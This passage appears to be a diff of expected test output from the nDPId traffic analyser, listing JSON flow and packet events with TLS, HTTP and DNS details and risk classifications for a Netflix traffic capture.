-01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
-01337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01352{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01352{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
+01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319070636,"flow_last_seen":1484319070636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319070636,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1484319070636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319070636,"pkt":"gCqoTGHM5JjWH70UCABFAABAs25AAEAGoh\/AqAEHF\/YLhc\/aAFBx1HGxAAAAALAC\/\/84uwAAAgQFtAEDAwUBAQgKH2VGAgAAAAAEAgAA"}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1484319070655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319070655,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz9pdV1SucdRxsqAS\/\/+\/OwAAAgQFtAEDAwkEAggKgYtW3h9lRgI="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2499,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1484319070656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319070656,"pkt":"gCqoTGHM5JjWH70UCABFAAA0S\/NAAEAGCafAqAEHF\/YLhc\/aAFBx1HGyXVdUr4AQEBXd4QAAAQEICh9lRhWBi1be"}
-01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}}
+01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319091296,"flow_last_seen":1484319091296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319091296,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1484319091296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319091296,"pkt":"gCqoTGHM5JjWH70UCABFAABAakNAAEAG60LAqAEHF\/YLjc\/hAFDAgDYQAAAAALAC\/\/\/YUQAAAgQFtAEDAwUBAQgKH2WTUQAAAAAEAgAA"}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4216,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1484319091309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319091309,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz+FsswOfwIA2EaAS\/\/85DQAAAgQFtAEDAwkEAggK\/T5Cox9lk1E="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4217,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1484319091310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319091310,"pkt":"gCqoTGHM5JjWH70UCABFAAA00UpAAEAGhEfAqAEHF\/YLjc\/hAFDAgDYRbLMDoIAQEBVXuAAAAQEICh9lk1\/9PkKj"}
-01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}}
+01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1484319114365,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1484319114365,"pkt":"gCqoTGHM5JjWH70UCABFAABCZ6UAAEARj63AqAEHwKgBAcmmADUALqajKFkBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1484319114365,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1484319114365,"pkt":"gCqoTGHM5JjWH70UCABFAABCN7AAAEARv6LAqAEHwKgBAcmmADUALiWYqUkBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="}
-00747{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00743{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1484319114384,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"ts_msec":1484319114384,"pkt":"5JjWH70UgCqoTGHMCABFAAEF4UpAAEAR1UTAqAEBwKgBBwA1yaYA8aaTKFmBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAhAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAEXABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AAQABAAAALwAENCAW1sBNAAEAAQAAAC8ABDQiMaPATQABAAEAAAAvAAQ0GyTuwE0AAQABAAAALwAENCJwJsBNAAEAAQAAAC8ABDQi04bATQABAAEAAAAvAAQ0GRpcwE0AAQABAAAALwAENCDSq8BNAAEAAQAAAC8ABDQi5lM="}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319114365,"flow_last_seen":1484319114384,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1484319114384,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"52.32.22.214"}}
